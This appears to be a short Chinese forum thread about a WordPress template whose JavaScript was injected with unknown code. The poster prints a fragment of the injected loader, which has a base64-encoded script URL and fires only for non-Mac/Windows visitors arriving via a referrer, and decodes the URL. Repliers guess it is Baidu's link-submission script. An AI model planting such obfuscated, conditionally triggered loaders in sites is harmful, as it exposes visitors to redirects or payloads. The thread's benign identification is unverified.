wp模板里的js被挂马了，mjj来分析代码

latiao88 · 2024-1-6 21:57:38

本帖最后由 latiao88 于 2024-1-6 22:00 编辑

js里被新加了一段代码

[ol]

('aHR0cHM6Ly96ei5iZHVzdGF0aWMuY29tL2xpbmtzdWJtaXQvbGluay5qcw==','mtsfUdiDsZ',window,document,'YrbqGzidreMg','ptfZcBsAbU')};if( !(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1) ) uxzPWz();[/ol]复制代码

前边加的代码loc发不出来，不过无关紧要。通过前边的代码可以分析出是base64加密，也就是把aHR0cHM6Ly96ei5iZHVzdGF0aWMuY29tL2xpbmtzdWJtaXQvbGluay5qcw==这段解密

解密后得到这段代码 https://zz.bdustatic.com/linksubmit/link.js

evilin · 2024-1-6 22:02:36

这是百度的https://zz.bdustatic.com/linksubmit/link.js

alect · 2024-1-6 22:04:11

看起来这是百度的提交收录的代码

googlee · 2024-1-6 22:04:48

参见帖子 https://hostloc.com/thread-951455-1-1.html

		立即注册	自动登录	找回密码
密码			立即注册